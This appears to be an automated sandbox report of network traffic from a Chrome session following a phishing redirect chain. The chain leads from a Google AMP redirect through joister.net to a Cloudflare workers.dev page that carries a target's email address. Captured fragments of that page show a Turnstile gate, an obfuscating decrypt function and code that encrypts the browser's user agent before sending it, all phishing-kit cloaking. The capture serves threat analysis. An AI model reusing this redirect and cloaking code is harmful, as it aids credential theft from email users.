                                        Jan 9, 2025 00:45:46.869966030 CET1.1.1.1192.168.2.160xd5ffNo error (0)joister.net120.138.96.3A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.32.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.16.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.96.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.80.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.64.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.112.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.476470947 CET1.1.1.1192.168.2.160xa877No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.48.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.477554083 CET1.1.1.1192.168.2.160x6670No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev65IN (0x0001)false
                                        Jan 9, 2025 00:45:48.504175901 CET1.1.1.1192.168.2.160x9954No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.504489899 CET1.1.1.1192.168.2.160x61dfNo error (0)www.google.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:49.669317007 CET1.1.1.1192.168.2.160xad32No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:49.669332027 CET1.1.1.1192.168.2.160x3a98No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:49.669332027 CET1.1.1.1192.168.2.160x3a98No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.961201906 CET1.1.1.1192.168.2.160x1addNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.961201906 CET1.1.1.1192.168.2.160x1addNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.961909056 CET1.1.1.1192.168.2.160x91a9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:50.971043110 CET1.1.1.1192.168.2.160x7385No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.971043110 CET1.1.1.1192.168.2.160x7385No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.971539974 CET1.1.1.1192.168.2.160x89ffNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.64.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.32.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.16.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.80.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.112.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.48.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.746151924 CET1.1.1.1192.168.2.160xfc4eNo error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev104.21.96.1A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.747004986 CET1.1.1.1192.168.2.160x96f5No error (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev65IN (0x0001)false
                                        Jan 9, 2025 00:46:01.389302015 CET1.1.1.1192.168.2.160x1a5aNo error (0)moderntoolbc.org194.87.71.235A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:46:03.502701044 CET1.1.1.1192.168.2.160x1d7bNo error (0)aask.co.com194.87.71.235A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:46:03.516324043 CET1.1.1.1192.168.2.160x6eaNo error (0)moderntoolbc.org194.87.71.235A (IP address)IN (0x0001)false
                                        • www.google.at
                                        • joister.net
                                        • https:
                                          • 2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                          • challenges.cloudflare.com
                                          • moderntoolbc.org
                                          • aask.co.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1649714120.138.96.3802916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 9, 2025 00:45:45.920054913 CET485OUTGET /tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1
                                        Host: joister.net
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Jan 9, 2025 00:45:46.859961033 CET587INHTTP/1.1 301 Moved Permanently
                                        Date: Wed, 08 Jan 2025 23:45:45 GMT
                                        Server: Apache
                                        Location: https://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        Content-Length: 287
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 69 73 74 65 72 2e 6e 65 74 2f 74 74 2f 74 74 74 2f 4e 6e 44 6d 50 61 44 4e 35 76 66 54 6e 6d 75 32 70 66 46 31 59 34 4b 62 6b 72 6d 2f 61 57 35 6d 62 30 42 68 59 32 46 6e 62 47 39 69 59 57 77 75 59 32 39 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t">here</a>.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1649715120.138.96.3802916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        Jan 9, 2025 00:46:30.928584099 CET6OUTData Raw: 00
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1649711142.250.184.1954432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:45 UTC1000OUTGET /url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1
                                        Host: www.google.at
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:45 UTC1057INHTTP/1.1 302 Found
                                        Location: https://www.google.at/amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        Cache-Control: private
                                        Content-Type: text/html; charset=UTF-8
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ezbOVBk57cVBGoisrlc0OA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                        Permissions-Policy: unload=()
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Date: Wed, 08 Jan 2025 23:45:45 GMT
                                        Server: gws
                                        Content-Length: 294
                                        X-XSS-Protection: 0
                                        Set-Cookie: NID=520=kQ1SKOZBlu5U9g9uH4DWl7AAwPtgBfVRWwdNkyUQMn_8hYl5hBgM9G8KKcL60IkzNEUUfoh-Ofgk-L8vMOdi9NPLrAhPccPFqTB_uRUrPidHYxSp1U9xJzl5kfoKA-sVZE-17MUKtU6pbxgWxWAHZyELTCpmjzZgwenN-xFr6_zxx231res87BkJN_hCWlgDMXMthA; expires=Thu, 10-Jul-2025 23:45:45 GMT; path=/; domain=.google.at; Secure; HttpOnly; SameSite=none
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2025-01-08 23:45:45 UTC294INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 61 74 2f 61 6d 70 2f 6a 6f 69 73 74 65 72 2e 6e 65 74 2f 74 74 2f 74 74 74 2f 4e 6e 44 6d 50 61 44 4e 35 76 66 54 6e 6d 75 32 70 66 46 31 59 34 4b 62 6b 72 6d 2f 61 57 35 6d 62 30 42 68 59 32 46 6e 62 47
                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.at/amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1649712142.250.184.1954432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:45 UTC1100OUTGET /amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1
                                        Host: www.google.at
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: NID=520=kQ1SKOZBlu5U9g9uH4DWl7AAwPtgBfVRWwdNkyUQMn_8hYl5hBgM9G8KKcL60IkzNEUUfoh-Ofgk-L8vMOdi9NPLrAhPccPFqTB_uRUrPidHYxSp1U9xJzl5kfoKA-sVZE-17MUKtU6pbxgWxWAHZyELTCpmjzZgwenN-xFr6_zxx231res87BkJN_hCWlgDMXMthA
                                        2025-01-08 23:45:45 UTC847INHTTP/1.1 302 Found
                                        Location: http://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        Cache-Control: private
                                        X-Robots-Tag: noindex
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-AHXcsDa0Bs4NHF6F3i4y9w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                        Permissions-Policy: unload=()
                                        Date: Wed, 08 Jan 2025 23:45:45 GMT
                                        Server: gws
                                        Content-Length: 275
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2025-01-08 23:45:45 UTC275INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 6a 6f 69 73 74 65 72 2e 6e 65 74 2f 74 74 2f 74 74 74 2f 4e 6e 44 6d 50 61 44 4e 35 76 66 54 6e 6d 75 32 70 66 46 31 59 34 4b 62 6b 72 6d 2f 61 57 35 6d 62 30 42 68 59 32 46 6e 62 47 39 69 59 57 77 75 59 32 39 74 22 3e 68 65 72 65 3c 2f 41
                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t">here</A


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.1649717120.138.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:47 UTC713OUTGET /tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1
                                        Host: joister.net
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:48 UTC280INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:47 GMT
                                        Server: Apache
                                        refresh: 0;url=https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev?email=info@acaglobal.com
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2025-01-08 23:45:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.1649718120.138.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:49 UTC637OUTGET /favicon.ico HTTP/1.1
                                        Host: joister.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.1649722104.21.32.14432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:49 UTC730OUTGET /?email=info@acaglobal.com HTTP/1.1
                                        Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://joister.net/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:49 UTC792INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1afgQ0HTrS3uN06UeHxKuF31%2FxubpwoRLJUPltp%2Fox5plbWZU7YDV9oRfwl5PkYW7SdRp41ibKtRSCsWpN7ejVYum%2BjbURd5vFnhmen%2BCDAi9c9Fa84%2FcfGcTYejaRHV3AtxnsJdH7GsB3uE07RSFxtwsKwPHpiUJy6fjTWZ%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ff0103c5b654344-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=1703&rtt_var=912&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3112&recv_bytes=1308&delivery_rate=2571931&cwnd=48&unsent_bytes=0&cid=15e7511c28365fb8&ts=227&x=0"
                                        2025-01-08 23:45:49 UTC577INData Raw: 31 36 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63
                                        Data Ascii: 1689<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
                                        2025-01-08 23:45:49 UTC1369INData Raw: 20 20 20 73 69 74 65 6b 65 79 3a 20 22 30 78 34 41 41 41 41 41 41 41 34 46 70 44 37 75 56 41 51 4e 34 4b 4c 5a 22 2c 20 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 76 65 72 69 66 79 43 61 6c 6c 62 61 63 6b 5f 43 46 2c 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 68 32 28 65 6e 63 72 79 70 74 65 64 54 65 78 74 2c 20 73 68 69 66 74 29 20 7b 0a 20 20 20 20 20 20 6c 65 74 20 64 65 63 72 79 70 74 65 64 54 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 63 20 3d 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 5b 69 5d 3b
                                        Data Ascii: sitekey: "0x4AAAAAAA4FpD7uVAQN4KLZ", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i];
                                        2025-01-08 23:45:49 UTC1369INData Raw: 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 60 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 52 65 71 75 65 73 74 28 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 41 67 65 6e 74 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 20 3d 20 45 6e 63 72 79 70 74 28 75 73 65 72 41 67 65 6e 74 2c 20 50 55 42 4c 49 43 5f 4b 45 59 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 53 65 6e 64 69 6e 67 20 72 65 71 75 65 73 74 20 77 69 74 68 20 65 6e 63 72 79 70 74 65 64 20 75 73 65 72 2d 61 67 65 6e 74 3a 27 2c 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 29 3b 0a 20 20 20 20 20 20 0a 20
                                        Data Ascii: END PUBLIC KEY-----`; function sendRequest() { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent);
                                        2025-01-08 23:45:49 UTC1369INData Raw: 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 66 6f 6f 74 65 72 2c 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69
                                        Data Ascii: .15s;background-color:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.main-content{margin:8rem auto;width:100%;max-width:60rem}.footer,.main-content{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{di
